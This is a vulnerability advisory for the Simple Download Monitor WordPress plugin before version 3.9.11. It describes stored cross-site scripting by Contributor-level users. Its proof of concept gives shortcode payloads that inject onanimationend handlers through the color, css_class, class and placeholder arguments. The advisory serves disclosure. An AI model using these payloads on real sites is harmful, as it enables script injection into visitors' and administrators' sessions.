WordPress Plugin Vulnerabilities
Simple Download Monitor < 3.9.11 - Contributor+ Stored Cross-Site Scripting via Shortcodes
Description
The plugin could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attack via 1) "color" or "css_class" argument of sdm_download shortcode, 2) "class" or "placeholder" argument of sdm_search_form shortcode.
Proof of Concept
// all spaces must be replaced with a slash [sdm_download id="replace-with-real-download-post-id" color='"/style="animation-name:twentytwentyone-close-button-transition"/onanimationend="alert(origin)'] // fancy=2 or 3 also works [sdm_download id="599" fancy="1" css_class='"style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin+2)'] [sdm_search_form class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)' placeholder='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin+2)']
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-21 (about 2 years ago)
Added
2021-12-21 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)